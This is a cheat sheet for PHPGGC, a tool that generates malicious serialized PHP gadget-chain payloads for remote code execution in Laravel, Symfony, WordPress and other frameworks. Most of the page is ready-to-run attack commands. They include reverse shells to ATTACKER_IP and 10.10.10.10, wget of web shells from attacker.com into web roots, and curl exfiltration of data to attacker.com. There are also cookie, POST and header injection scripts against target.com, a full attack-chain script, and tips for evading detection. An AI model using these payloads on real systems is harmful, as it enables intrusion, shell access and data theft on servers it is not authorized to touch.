PHPGGC
Overview
섹션 제목: “Overview”PHPGGC (PHP Generic Gadget Chains) is a tool for generating malicious serialized PHP objects that exploit insecure deserialization vulnerabilities. It leverages “gadget chains” from common PHP frameworks and libraries to achieve remote code execution (RCE) when vulnerable applications unserialize untrusted data.
Key Features:
- Pre-built gadget chains for popular PHP frameworks
- Automatic payload generation for common targets
- Support for multiple exploitation techniques
- Chain discovery and analysis
- Custom gadget chain creation
- Integration with exploitation frameworks
Installation
섹션 제목: “Installation”From GitHub
섹션 제목: “From GitHub”git clone https://github.com/ambionics/phpggc.git
cd phpggcVerify Installation
섹션 제목: “Verify Installation”./phpggc --version
./phpggc -lDocker
섹션 제목: “Docker”docker run -it --rm ambionics/phpggcRequirements
섹션 제목: “Requirements”- PHP 7.0+ or 8.0+
- Composer (optional, for dependency management)
Basic Usage
섹션 제목: “Basic Usage”List Available Gadget Chains
섹션 제목: “List Available Gadget Chains”./phpggc -l
./phpggc -l | grep "Laravel"Generate Simple Payload
섹션 제목: “Generate Simple Payload”./phpggc Laravel/RCEGenerate With Command
섹션 제목: “Generate With Command”./phpggc Laravel/RCE system "whoami"Specify Output Format
섹션 제목: “Specify Output Format”./phpggc -f json Laravel/RCE system "whoami"
./phpggc -f phtml Laravel/RCE system "whoami"Core Commands
섹션 제목: “Core Commands”| Command | Description |
|---|---|
-l, --list | List all available gadget chains |
-i, --info | Show detailed chain information |
-c, --chains | Show chains for specific framework |
-f, --format | Output format (raw, base64, json, phtml, etc.) |
-s, --side-effect | Generate chain with side effects |
--template | Use custom template for payload |
--skip-vulnerabilities | Skip vulnerability checks |
--verbose | Verbose output |
Available Gadget Chains
섹션 제목: “Available Gadget Chains”Laravel Chains
섹션 제목: “Laravel Chains”# RCE via Laravel gadgets
./phpggc Laravel/RCE
# List all Laravel chains
./phpggc -l | grep -i laravelSymfony Chains
섹션 제목: “Symfony Chains”# RCE via Symfony
./phpggc Symfony/RCE
# EventDispatcher exploitation
./phpggc -i Symfony/EventDispatcherWordPress Chains
섹션 제목: “WordPress Chains”# WordPress plugin exploitation
./phpggc WordPress/RCE
./phpggc WordPress/PluginZend Framework Chains
섹션 제목: “Zend Framework Chains”# Zend/Laminas exploitation
./phpggc Zend/RCE
./phpggc Laminas/RCEOther Popular Frameworks
섹션 제목: “Other Popular Frameworks”./phpggc Yii/RCE
./phpggc CakePHP/RCE
./phpggc Doctrine/RCE
./phpggc Magento/RCEOutput Formats
섹션 제목: “Output Formats”Raw Serialized Format
섹션 제목: “Raw Serialized Format”./phpggc -f raw Laravel/RCE system "whoami"Base64 Encoded
섹션 제목: “Base64 Encoded”./phpggc -f base64 Laravel/RCE system "whoami"URL Encoded
섹션 제목: “URL Encoded”./phpggc -f url Laravel/RCE system "whoami"JSON Format
섹션 제목: “JSON Format”./phpggc -f json Laravel/RCE system "whoami"PHTML (PHP file)
섹션 제목: “PHTML (PHP file)”./phpggc -f phtml Laravel/RCE system "whoami" > payload.php
php payload.phpExploitation Techniques
섹션 제목: “Exploitation Techniques”Remote Command Execution
섹션 제목: “Remote Command Execution”# Execute system commands
./phpggc Laravel/RCE system "id"
./phpggc Laravel/RCE system "cat /etc/passwd"
./phpggc Laravel/RCE system "curl http://attacker.com"Reverse Shell
섹션 제목: “Reverse Shell”# Generate reverse shell payload
./phpggc Laravel/RCE system "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
# Or with nc
./phpggc Laravel/RCE system "nc -e /bin/bash ATTACKER_IP 4444"File Writing
섹션 제목: “File Writing”# Write files via payload
./phpggc Laravel/RCE system "echo 'shell code' > /tmp/shell.php"
# More complex file operations
./phpggc Laravel/RCE system "wget http://attacker.com/shell.php -O /var/www/shell.php"Data Exfiltration
섹션 제목: “Data Exfiltration”# Extract sensitive data
./phpggc Laravel/RCE system "cat /var/www/config.php | base64"
# Curl exfiltration
./phpggc Laravel/RCE system "curl http://attacker.com/log.php?data=$(whoami)"Chain Information and Analysis
섹션 제목: “Chain Information and Analysis”Detailed Chain Information
섹션 제목: “Detailed Chain Information”# Get full details about a chain
./phpggc -i Laravel/RCE
# Show vulnerability details
./phpggc -i Symfony/RCE --verboseList Chains by Framework
섹션 제목: “List Chains by Framework”# All chains for a specific framework
./phpggc -l Laravel
./phpggc -l WordPress
./phpggc -l SymfonySearch for Specific Gadgets
섹션 제목: “Search for Specific Gadgets”# Find chains containing specific keywords
./phpggc -l | grep -i "file"
./phpggc -l | grep -i "execute"Advanced Usage
섹션 제목: “Advanced Usage”Custom Templates
섹션 제목: “Custom Templates”# Using custom template file
./phpggc -f raw --template custom.template Laravel/RCE system "whoami"Side Effect Chains
섹션 제목: “Side Effect Chains”# Chains with side effects (file write, etc.)
./phpggc -s Laravel/RCE system "whoami"Chaining Multiple Commands
섹션 제목: “Chaining Multiple Commands”# Execute multiple commands
./phpggc Laravel/RCE system "id; whoami; pwd"
# Or use command separator
./phpggc Laravel/RCE system "cmd1 && cmd2 && cmd3"Bypassing Filters
섹션 제목: “Bypassing Filters”# Using alternative command syntax
./phpggc Laravel/RCE system "sh -c 'command'"
# Hex encoding commands
./phpggc Laravel/RCE system "echo 'x' | xxd -r -p"Integration with Exploitation Workflows
섹션 제목: “Integration with Exploitation Workflows”Web Application Testing
섹션 제목: “Web Application Testing”# Generate payload for cookie injection
PAYLOAD=$(./phpggc -f base64 Laravel/RCE system "whoami")
curl -b "session=$PAYLOAD" http://target.com
# For POST parameter
curl -X POST http://target.com -d "data=$(./phpggc -f url Laravel/RCE system 'id')"Automated Exploitation
섹션 제목: “Automated Exploitation”# Generate payload and store in variable
PAYLOAD=$(./phpggc -f raw Laravel/RCE system "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1")
# Use in exploitation script
php -r "echo unserialize(base64_decode('$PAYLOAD'));"Testing Multiple Frameworks
섹션 제목: “Testing Multiple Frameworks”#!/bin/bash
# Test multiple framework vulnerabilities
COMMAND="id"
for framework in Laravel Symfony Yii WordPress; do
echo "Testing $framework..."
./phpggc -f raw "$framework/RCE" system "$COMMAND"
doneSerialization and Injection Points
섹션 제목: “Serialization and Injection Points”URL Parameter Injection
섹션 제목: “URL Parameter Injection”# Target URL with serialized parameter
curl "http://target.com/profile?data=$(./phpggc -f url Laravel/RCE system 'whoami')"Cookie Injection
섹션 제목: “Cookie Injection”# Inject serialized payload into cookie
curl -b "session=$(./phpggc -f base64 Laravel/RCE system 'id')" http://target.comPOST Body Injection
섹션 제목: “POST Body Injection”# Inject into POST parameter
curl -X POST http://target.com \
-d "profile=$(./phpggc -f url Laravel/RCE system 'whoami')"Header Injection
섹션 제목: “Header Injection”# Inject into custom header
curl -H "X-Data: $(./phpggc -f base64 Laravel/RCE system 'id')" http://target.comReal-World Exploitation Scenarios
섹션 제목: “Real-World Exploitation Scenarios”Laravel Application RCE
섹션 제목: “Laravel Application RCE”# Step 1: Identify Laravel application
# Step 2: Find unserialize() call (typically in session handling)
# Step 3: Generate payload
PAYLOAD=$(./phpggc -f base64 Laravel/RCE system "whoami")
# Step 4: Inject into vulnerable endpoint
curl -b "PHPSESSID=$PAYLOAD" http://target-laravel.comWordPress Plugin Exploitation
섹션 제목: “WordPress Plugin Exploitation”# Identify vulnerable WordPress plugin using gadget chains
./phpggc -i WordPress/RCE
# Generate exploitation payload
./phpggc -f raw WordPress/RCE system "wp_create_user attacker password123"
# Or modify WordPress files
./phpggc WordPress/RCE system "wget http://attacker.com/shell.php -O /var/www/wp-content/shell.php"Symfony Application Attack
섹션 제목: “Symfony Application Attack”# Identify Symfony version and components
# Generate appropriate Symfony chain
./phpggc -l | grep Symfony
./phpggc -i Symfony/EventDispatcher
# Create payload targeting EventDispatcher
PAYLOAD=$(./phpggc -f base64 Symfony/RCE system "id")Payload Encoding and Obfuscation
섹션 제목: “Payload Encoding and Obfuscation”Base64 Encoding
섹션 제목: “Base64 Encoding”# Generate base64-encoded payload
./phpggc -f base64 Laravel/RCE system "whoami" > payload.b64
# Decode and execute
cat payload.b64 | base64 -d | phpURL Encoding
섹션 제목: “URL Encoding”# Generate URL-safe payload
./phpggc -f url Laravel/RCE system "whoami"
# Use in URL parameter
echo "http://target.com?data=$(./phpggc -f url Laravel/RCE system 'id')"Hexadecimal Encoding
섹션 제목: “Hexadecimal Encoding”# Encode command to hex
echo -n "whoami" | xxd -p
# Use in payload
./phpggc Laravel/RCE system "echo '$(echo -n whoami | xxd -p)' | xxd -r -p"Defensive Analysis
섹션 제목: “Defensive Analysis”Identify Vulnerable Code Patterns
섹션 제목: “Identify Vulnerable Code Patterns”# Look for unserialize() in source code
grep -r "unserialize" /path/to/php/app
# Check for user input passing to unserialize
grep -r "unserialize(\$_" /path/to/php/appTesting for Gadget Chain Exploitation
섹션 제목: “Testing for Gadget Chain Exploitation”# Run test payload through application
PAYLOAD=$(./phpggc Laravel/RCE system "touch /tmp/test")
# Monitor for execution
tail -f /var/log/apache2/access.logVersion Detection
섹션 제목: “Version Detection”# Detect framework version for appropriate chains
curl -s http://target.com | grep -i "Laravel\|Symfony\|WordPress"
# Check composer.lock or package files
curl http://target.com/composer.lock 2>/dev/null | grep -i versionPractical Exploitation Workflow
섹션 제목: “Practical Exploitation Workflow”Full Attack Chain
섹션 제목: “Full Attack Chain”#!/bin/bash
TARGET="http://target.com"
FRAMEWORK="Laravel"
# Step 1: Identify vulnerability
echo "[+] Testing for deserialization vulnerabilities..."
# Step 2: Generate payload for RCE
COMMAND="bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"
PAYLOAD=$(./phpggc -f base64 "$FRAMEWORK/RCE" system "$COMMAND")
# Step 3: Deliver payload
echo "[+] Injecting payload..."
curl -b "session=$PAYLOAD" "$TARGET/dashboard"
# Step 4: Listener
# nc -lvnp 4444Testing Multiple Injection Points
섹션 제목: “Testing Multiple Injection Points”#!/bin/bash
PAYLOAD=$(./phpggc -f base64 Laravel/RCE system "id")
# Test different injection points
echo "Testing Cookie..."
curl -b "data=$PAYLOAD" http://target.com
echo "Testing POST..."
curl -X POST -d "input=$PAYLOAD" http://target.com
echo "Testing Header..."
curl -H "X-Custom: $PAYLOAD" http://target.comTroubleshooting
섹션 제목: “Troubleshooting”Payload Not Executing
섹션 제목: “Payload Not Executing”# Verify PHP version compatibility
php --version
# Test payload locally first
php -r "echo unserialize(base64_decode('PAYLOAD_HERE'));"
# Check target uses unserialize()
grep -r "unserialize" target_code/Encoding Issues
섹션 제목: “Encoding Issues”# Test different output formats
./phpggc -f raw Laravel/RCE system "whoami"
./phpggc -f base64 Laravel/RCE system "whoami"
./phpggc -f json Laravel/RCE system "whoami"Chain Not Found
섹션 제목: “Chain Not Found”# Update PHPGGC database
git pull
./phpggc -l --refresh
# Check if framework is supported
./phpggc -l | grep -i "framework_name"Security Considerations
섹션 제목: “Security Considerations”Safe Testing
섹션 제목: “Safe Testing”- Only test on authorized systems
- Use isolated lab environments
- Document all testing activities
- Have rollback procedures ready
Payload Detection
섹션 제목: “Payload Detection”- Avoid common payload patterns
- Use encoding/obfuscation
- Employ timing-based techniques
- Monitor system logs for detection
Version and Updates
섹션 제목: “Version and Updates”# Check version
./phpggc --version
# Update gadget chains
cd phpggc && git pull origin masterLegal and Ethical Considerations
섹션 제목: “Legal and Ethical Considerations”Critical: PHPGGC generates payloads for testing deserialization vulnerabilities only on systems where you have explicit authorization. Unauthorized exploitation is illegal. Always obtain written permission before conducting security assessments on any system.